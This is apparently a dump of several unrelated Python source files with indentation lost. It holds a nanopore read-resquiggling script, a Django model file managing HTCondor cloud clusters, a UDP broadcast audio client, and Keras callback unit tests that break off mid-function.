p = mp.Process(target=resquiggle_worker, args=rsqgl_args)
p.start()
resquiggle_ps.append(p)
if VERBOSE: sys.stderr.write(
'Correcting ' + str(num_reads) + ' files with ' +
str(len(basecall_subgroups)) + ' subgroup(s)/read(s) ' +
'each (Will print a dot for each 100 files completed).\n')
failed_reads = defaultdict(list)
while any(p.is_alive() for p in align_ps):
try:
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
except Queue.Empty:
sleep(1)
continue
# add None entried to basecalls_q to indicate that all reads have
# been basecalled and processed
for _ in xrange(num_resquiggle_ps):
basecalls_q.put((None, None))
while any(p.is_alive() for p in resquiggle_ps):
try:
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
except Queue.Empty:
sleep(1)
continue
# empty any entries left in queue after processes have finished
while not failed_reads_q.empty():
errorType, fn = failed_reads_q.get(block=False)
failed_reads[errorType].append(fn)
# print newline after read progress dots
if VERBOSE: sys.stderr.write('\n')
return dict(failed_reads)
def resquiggle_main(args):
global VERBOSE
VERBOSE = not args.quiet
# currently required, but adding new mappers shortly
if args.graphmap_executable is None:
if args.bwa_mem_executable is None:
sys.stderr.write(
'*' * 60 + '\nERROR: Must provide either a ' + \
'graphmap or bwa-mem executable.\n' + '*' * 60 + '\n')
sys.exit()
mapper_exe = args.bwa_mem_executable
mapper_type = 'bwa_mem'
else:
mapper_exe = args.graphmap_executable
mapper_type = 'graphmap'
if VERBOSE: sys.stderr.write('Getting file list.\n')
try:
if args.fast5_pattern or args.recursive:
fast5_pat = "*/*.fast5" if args.recursive else \
args.fast5_pattern
files = glob(os.path.join(args.fast5_basedir, fast5_pat))
else:
files = [
os.path.join(args.fast5_basedir, fn)
for fn in os.listdir(args.fast5_basedir)
if os.path.isfile(os.path.join(args.fast5_basedir, fn))]
except OSError:
sys.stderr.write(
'*' * 60 + '\nERROR: One of the directories does not ' +
'appear to be accessible. Check directory permissions.\n' +
'*' * 60 + '\n')
sys.exit()
if len(files) < 1:
sys.stderr.write(
'*' * 60 + '\nERROR: No files identified in the specified ' +
'directories. If files are stored in subdirectories ' +
'(e.g. 0/, 1/, ...) specify the --recursive or ' +
'--fast5-pattern "*/*.fast5" options appropriately.\n' +
'*' * 60 + '\n')
sys.exit()
outlier_thresh = args.outlier_threshold if (
args.outlier_threshold > 0) else None
# resolve processor and thread arguments
num_proc = 2 if args.processes < 2 else args.processes
align_threads_per_proc = \
max(int(num_proc / (2 * args.align_processes)), 1) \
if args.align_threads_per_process is None else \
args.align_threads_per_process
num_resquiggle_ps = int(num_proc / 2) \
if args.resquiggle_processes is None \
else args.resquiggle_processes
# whether or not to skip SD calculation due to time
compute_sd = not args.skip_event_stdev
# parse pore model if k-mer conditional corrected pA values
# are requested
pore_model = None
if args.normalization_type == 'pA':
pore_model = nh.parse_pore_model(args.pore_model_filename)
failed_reads = resquiggle_all_reads(
files, args.genome_fasta, mapper_exe, mapper_type,
args.basecall_group, args.basecall_subgroups,
args.corrected_group, args.normalization_type, outlier_thresh,
args.timeout, args.cpts_limit, args.overwrite,
args.alignment_batch_size, args.align_processes,
align_threads_per_proc, num_resquiggle_ps, compute_sd,
pore_model)
sys.stderr.write('Failed reads summary:\n' + '\n'.join(
"\t" + err + " :\t" + str(len(fns))
for err, fns in failed_reads.items()) + '\n')
if args.failed_reads_filename is not None:
with open(args.failed_reads_filename, 'w') as fp:
fp.write('\n'.join((
err + '\t' + ','.join(fns)
for err, fns in failed_reads.items())) + '\n')
return
def args_and_main():
resquiggle_main(
option_parsers.get_resquiggle_parser().parse_args())
return
if __name__ == '__main__':
args_and_main()
|
models.py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import pre_save, post_save, post_delete
from django.dispatch import receiver
from django.utils import timezone
from tethys_compute import TETHYSCLUSTER_CFG_FILE, TETHYSCLUSTER_CFG_TEMPLATE
import os, re
from multiprocessing import Process
from tethyscluster import config as tethyscluster_config
class SettingsCategory(models.Model):
name = models.CharField(max_length=30)
class Meta:
verbose_name = 'Settings Category'
verbose_name_plural = 'Settings'
def __unicode__(self):
return self.name
class Setting(models.Model):
name = models.TextField(max_length=30)
content = models.TextField(max_length=500, blank=True)
date_modified = models.DateTimeField('date modified', auto_now=True)
category = models.ForeignKey(SettingsCategory)
def __unicode__(self):
return self.name
@classmethod
def as_dict(cls):
all_settings = cls.objects.all()
settings_dict = dict()
for setting in all_settings:
code_name = setting.name.lower().replace(' ', '_')
settings_dict[code_name] = setting.content
return settings_dict
@receiver(post_save, sender=Setting)
def setting_post_save(sender, instance, created, raw, using, update_fields, **kwargs):
settings = Setting.as_dict()
with open(TETHYSCLUSTER_CFG_FILE, 'w') as config_file:
config_file.write(TETHYSCLUSTER_CFG_TEMPLATE % settings)
class Cluster(models.Model):
STATUSES = (
('STR', 'Starting'),
('RUN', 'Running'),
('STP', 'Stopped'),
('UPD', 'Updating'),
('DEL', 'Deleting'),
('ERR', 'Error'),
)
STATUS_DICT = {k:v for v,k in STATUSES}
PROVIDERS = (
('AWS', 'Amazon Web Services'),
('AZR', 'Microsoft Azure'),
)
try:
TC_MANAGER = tethyscluster_config.get_cluster_manager()
except Exception as e:
print e.message
TC_MANAGER = None
_name = models.CharField(max_length=30, unique=True, default='tethys_default')
_size = models.IntegerField(default=1)
_status = models.CharField(max_length=3, choices=STATUSES, default=STATUS_DICT['Starting'])
_cloud_provider = models.CharField(max_length=3, choices=PROVIDERS, default=PROVIDERS[0][0])
_master_image_id = models.CharField(max_length=9, blank=True, null=True)
_node_image_id = models.CharField(max_length=9, blank=True, null=True)
_master_instance_type = models.CharField(max_length=20, blank=True, null=True)
_node_instance_type = models.CharField(max_length=20, blank=True, null=True)
_tethys_cluster = None
@classmethod
def create(cls, name, size=1):
return cls(name=name, size=size)
def __unicode__(self):
return '%s (%d-node)' % (self.name, self.size)
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def size(self):
return self._size
@size.setter
def size(self, size):
object.__setattr__(self, '_size', size)
@property
def status(self):
self._update_status()
field = self._meta.get_field('_status')
return self._get_FIELD_display(field)
@property
def cloud_provider(self):
field = self._meta.get_field('_cloud_provider')
return self._get_FIELD_display(field)
@property
def tethys_cluster(self):
if not self._tethys_cluster:
try:
self._tethys_cluster = self.TC_MANAGER.get_cluster_or_none(self.name)
except Exception as e:
print e.message
return self._tethys_cluster
def create_tethys_cluster(self):
tc = self.tethys_cluster
if not tc:
try:
tc = self.TC_MANAGER.get_default_template_cluster(self.name)
tc.update({'cluster_size':self.size})
tc.start(validate_only=False)
self._tethys_cluster = tc
self.connect_scheduler_and_master()
self.save()
except Exception as e:
print e.message
else:
pass
#raise
def connect_scheduler_and_master(self):
def add_value_to_condor_config(config_file, attr, value):
text = config_file.read()
text_parts = re.split('^\s*%s ?= ?' % (attr, ), text, flags=re.IGNORECASE|re.M)
if len(text_parts) > 1:
last_part = text_parts.pop()
new_last_part = '%s %s' % (value, last_part)
text_parts.append(new_last_part)
join_attr = '%s = ' % (attr, )
new_text = join_attr.join(text_parts)
else:
new_text = '%s\n%s = %s\n' % (text, attr, value)
config_file.seek(0)
config_file.write(new_text)
def get_public_ip():
import urllib2, json
json_response = urllib2.urlopen('http://ip.jsontest.com/').read()
host_ip = json.loads(json_response)['ip']
return host_ip
tc = self.tethys_cluster
if tc:
master = tc.master_node
settings = Setting.as_dict()
scheduler_ip = settings['scheduler_ip'] or get_public_ip()
master_local_config_file = master.ssh.execute('condor_config_val local_config_file')[0]
with master.ssh.remote_file(master_local_config_file, mode='r+') as config_file:
add_value_to_condor_config(config_file, 'FLOCK_FROM', scheduler_ip)
p = os.popen('condor_config_val local_config_file')
local_config_file = p.read().strip('\n')
p.close()
with open(local_config_file, 'r+') as config_file:
add_value_to_condor_config(config_file, 'FLOCK_TO', master.ip_address)
def update_tethys_cluster(self):
#TODO check if connection to master needs to be updated
tc = self.tethys_cluster
if tc:
tc_size = len(tc.nodes)
delta = abs(tc_size - self.size)
if delta != 0:
cmd = self._add_nodes if self.size > tc_size else self._remove_nodes
cmd(delta)
else:
self.create_tethys_cluster()
#raise
def delete_tethys_cluster(self):
#TODO remove master_ip from local condor config
tc = self.tethys_cluster
if tc:
tc.terminate_cluster(force=True)
def _add_nodes(self, num_nodes, image_id=None, instance_type=None, spot_bid=None):
tc = self.tethys_cluster
tc.add_nodes(num_nodes, image_id=image_id, instance_type=instance_type, spot_bid=spot_bid)
self._sync()
def _remove_nodes(self, num_nodes):
tc = self.tethys_cluster
tc.remove_nodes(num_nodes=num_nodes, force=True)
self._sync()
def _update_status(self):
old_status = self._status
tc = self.tethys_cluster
if tc is None:
if self._status == self.STATUS_DICT['Starting']:
pass
elif self._status == self.STATUS_DICT['Deleting']:
self.delete() #TODO: Not so sure this will work
else:
self._status = self.STATUS_DICT['Error']
elif self._status == self.STATUS_DICT['Updating']:
if tc.is_cluster_up() and len(tc.nodes) == self.size:
self._status = self.STATUS_DICT['Running']
elif (self._status == self.STATUS_DICT['Starting'] or self._status == self.STATUS_DICT['Stopped']) and tc.is_cluster_up():
self._status = self.STATUS_DICT['Running']
elif self._status == self.STATUS_DICT['Running']:
if tc.is_cluster_stopped():
self._status = self.STATUS_DICT['Stopped']
elif not tc.is_valid():
self._status = self.STATUS_DICT['Error']
@receiver(pre_save, sender=Cluster)
def cluster_pre_save(sender, instance, raw, using, update_fields, **kwargs):
instance._update_status()
@receiver(post_save, sender=Cluster)
def cluster_post_save(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
target = instance.create_tethys_cluster
else:
target = instance.update_tethys_cluster
process = Process(target=target)
process.start()
@receiver(post_delete, sender=Cluster)
def cluster_post_delete(sender, instance, **kwargs):
process = Process(target=instance.delete_tethys_cluster)
process.start()
class TethysJob(models.Model):
STATUSES = (
('PEN', 'Pending'),
('SUB', 'Submitted'),
('RUN', 'Running'),
('COM', 'Complete'),
('ERR', 'Error'),
)
name = models.CharField(max_length=30)
user = models.ForeignKey(User)
group = models.CharField(max_length=30)
creation_time = models.DateTimeField(default=timezone.now())
submission_time = models.DateTimeField()
completion_time = models.DateTimeField()
status = models.CharField(max_length=3, choices=STATUSES, default=STATUSES[0][0])
def execute(self):
"""
:return:
"""
pass
def stop(self):
"""
:return:
"""
pass
def pause(self):
"""
:return:
"""
pass
class CondorJob(TethysJob):
scheduler = models.CharField(max_length=12)
ami = models.CharField(max_length=9)
@property
def condorpy_job(self):
pass
|
clientAudio.py
|
from array import array
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET, SO_BROADCAST, SO_REUSEPORT, gethostname, gethostbyname
from threading import Thread
import pyaudio
HOST = '127.0.0.1'
PORT = 4000
BufferSize = 4096
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
CHUNK = 256
class Client:
def __init__(self, host='', port=37020, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._sock = socket(AF_INET, SOCK_DGRAM) # UDP
self._sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self._sock.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
audio = pyaudio.PyAudio()
self._stream = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True,
frames_per_buffer=CHUNK)
def start(self):
self._sock.bind((self._host, self._port))
Thread(target=self._handle_audio_in).start()
Thread(target=self._handle_audio_out).start()
def _handle_audio_in(self):
while True:
# data = self._recvall(self._buffer_size)
data, addr = self._sock.recvfrom(self._buffer_size)
print(f'{addr[0]}:{gethostbyname(gethostname())}')
if addr[0] != gethostbyname(gethostname()):
self._stream.write(data)
def _recvall(self, size):
databytes = b''
while len(databytes) != size:
to_read = size - len(databytes)
if to_read > (4 * CHUNK):
databytes += self._sock.recvfrom(4 * CHUNK)
else:
databytes += self._sock.recvfrom(to_read)
return databytes
def _handle_audio_out(self):
while True:
data = self._stream.read(CHUNK, exception_on_overflow=False)
data_chunk = array('h', data)
volume = max(data_chunk)
self._sock.sendto(data, ('<broadcast>', self._port))
def tcp_server():
def SendAudio():
while True:
data = stream.read(CHUNK, exception_on_overflow=False)
data_chunk = array('h', data)
volume = max(data_chunk)
client.sendall(data)
def RecieveAudio():
while True:
data = recvall(BufferSize)
stream.write(data)
def recvall(size):
databytes = b''
while len(databytes) != size:
to_read = size - len(databytes)
if to_read > (4 * CHUNK):
databytes += client.recv(4 * CHUNK)
else:
databytes += client.recv(to_read)
return databytes
client = socket(family=AF_INET, type=SOCK_STREAM)
client.connect((HOST, PORT))
audio = pyaudio.PyAudio()
stream = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK)
RecieveAudioThread = Thread(target=RecieveAudio).start()
SendAudioThread = Thread(target=SendAudio).start()
def voice_server():
_socket = socket(AF_INET, SOCK_DGRAM)
while 1:
message = input("> ")
# encode the message
message = message.encode()
# send the message
_socket.sendto(message, ("127.0.0.1", 6666))
# output the response (if any)
data, ip = _socket.recvfrom(1024)
print("{}: {}".format(ip, data.decode()))
def broadcast_receive():
import socket
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
client.bind(("", 37020))
while True:
data, addr = client.recvfrom(1024)
print("received message: %s" % data)
if __name__ == '__main__':
client = Client()
client.start()
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from numpy.testing import assert_allclose
from csv import reader
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.pooling import GlobalAveragePooling1D
from keras.layers.pooling import GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.generic_utils import to_list
from keras.utils.generic_utils import unpack_singleton
from keras import backend as K
from keras.utils import np_utils
try:
from unittest.mock import patch
except:
from mock import patch
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
def data_generator(x, y, batch_size):
x = to_list(x)
y = to_list(y)
max_batch_index = len(x[0]) // batch_size
i = 0
while 1:
x_batch = [array[i * batch_size: (i + 1) * batch_size] for array in x]
x_batch = unpack_singleton(x_batch)
y_batch = [array[i * batch_size: (i + 1) * batch_size] for array in y]
y_batch = unpack_singleton(y_batch)
yield x_batch, y_batch
i += 1
i = i % max_batch_index
# Changing the default arguments of get_test_data.
def get_data_callbacks(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes):
return get_test_data(num_train=num_train,
num_test=num_test,
input_shape=input_shape,
classification=classification,
num_classes=num_classes)
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
# case 1 fit
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
history = model.fit_generator(data_generator(X_train, y_train, batch_size),
len(X_train),
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
def test_stop_training_csv(tmpdir):
np.random.seed(1337)
fp = str(tmpdir / 'test.csv')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
model = Sequential()
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(X_train) // batch_size
tot = 0
while 1:
if tot > 3 * len(X_train):
yield (np.ones([batch_size, input_dim]) * np.nan,
np.ones([batch_size, num_classes]) * np.nan)
else:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
tot += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train) // batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in reader(f):
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
os.remove(fp)
def test_ModelCheckpoint(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'checkpoint.h5')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.isfile(filepath.format(epoch=2))
assert os.path.isfile(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not tmpdir.listdir()
def test_EarlyStopping():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_patience():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040, 0.1019]
# Should stop after epoch 3,
# as the loss has not improved after patience=2 epochs.
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
assert epochs_trained == 3
def test_EarlyStopping_baseline():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
def baseline_tester(acc_levels):
early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75,
patience=2)
early_stop.model = DummyModel()
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(acc_levels)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]})
if early_stop.model.stop_training:
break
return epochs_trained
acc_levels = [0.55, 0.76, 0.81, 0.81]
baseline_met = baseline_tester(acc_levels)
acc_levels = [0.55, 0.74, 0.81, 0.81]
baseline_not_met = baseline_tester(acc_levels)
# All epochs should run because baseline was met in second epoch
assert baseline_met == 4
# Baseline was not met by second epoch and should stop
assert baseline_not_met == 2
def test_EarlyStopping_final_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in the epoch 2 (loss = 0.1000),
# so with patience=2 we need to end up at epoch 4
assert early_stop.model.get_weights() == 4
def test_EarlyStopping_final_weights_when_restoring_model_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
assert early_stop.model.get_weights() == 2
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
min_delta=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert_allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
min_delta=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert_allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_ReduceLROnPlateau_patience():
class DummyOptimizer(object):
def __init__(self):
self.lr = K.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss',
patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0
def test_ReduceLROnPlateau_backwards_compatibility():
import warnings
with warnings.catch_warnings(record=True) as ws:
reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13)
# Check if warnings are disabled
if os.environ.get("PYTHONWARNINGS") != "ignore":
assert "`epsilon` argument is deprecated" in str(ws[0].message)
assert not hasattr(reduce_on_plateau, 'epsilon')
assert hasattr(reduce_on_plateau, 'min_delta')
assert reduce_on_plateau.min_delta == 1e-13
def test_CSVLogger(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'log.tsv')
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
import re
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = " ".join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support it yet.')
@pytest.mark.parametrize('update_freq', ['batch', 'epoch', 9])
def test_TensorBoard(tmpdir, update_freq):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
class DummyStatefulMetric(Layer):
def __init__(self, name='dummy_stateful_metric', **kwargs):
super(DummyStatefulMetric, self).__init__(name=name, **kwargs)
self.stateful = True
self.state = K.variable(value=0, dtype='int32')
def reset_states(self):
pass
def __call__(self, y_true, y_pred):
return self.state
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy', DummyStatefulMetric()])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=X_test,
batch_size=5,
update_freq=update_freq)]
# fit without validation data
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0),
epochs=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test),
